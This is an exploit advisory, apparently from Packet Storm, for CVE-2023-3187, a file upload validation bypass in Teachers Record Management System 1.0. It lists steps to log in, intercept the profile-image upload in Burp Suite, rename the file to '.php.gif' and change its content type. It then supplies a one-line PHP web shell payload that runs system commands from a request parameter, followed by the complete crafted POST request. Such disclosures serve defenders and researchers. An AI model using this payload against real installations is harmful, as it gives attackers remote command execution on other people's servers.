Lucene search
AFFAN AHMEDPACKETSTORM:172909HistoryJun 14, 2023 - 12:00 a.m.
Teachers Record Management System 1.0 Validation Bypass
2023-06-1400:00:00
AFFAN AHMED
packetstormsecurity.com
187
exploit
validation bypass
teacher record system
file upload
vulnerability
burp suite
content type
cve-2023-3187
php guru kul
affan ahmed
windows 11
xampp
EPSS
0.002
Percentile
57.2%
`Exploit Title: Teachers Record Management System 1.0 β File Upload Type Validation
Date: 17-01-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://phpgurukul.com>
Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3187
===============================
STEPS_TO_REPRODUCE
===============================
1. Login into Teacher-Account with the credentials βUsername: [email protected]β
Password: Test@123β
2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image
3. Open the Burp-suite and Intercept the Edit Image Request
4. In POST Request Change the β Filename β from β profile picture.png β to βprofile picture.php.gif β
5. Change the **Content-type from β image/png β to β image/gif β
6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>`
7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension**
8. Below is the Burpsuite-POST Request for all the changes that I have made above
==========================================
BURPSUITE_REQUEST
==========================================
POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: <http://localhost>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: <http://localhost/trms/teacher/changeimage.php>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
Connection: close
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="subjects"
John Doe
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif
GIF89a <?php echo system($_REQUEST['dx']); ?>
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="submit"
------WebKitFormBoundaryndAPYa0GGOxSUHdF--
===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md
`
Related
cve
cve
CVE-2023-3187
2023-06-09 21:15:09
exploitdb
exploitdb
Teachers Record Management System 1.0 - File Upload Type Validation
2023-06-13 00:00:00
cvelist
cvelist
nvd
nvd
CVE-2023-3187
2023-06-09 21:15:09
prion
prion
Out-of-bounds
2023-06-09 21:15:00
zdt
zdt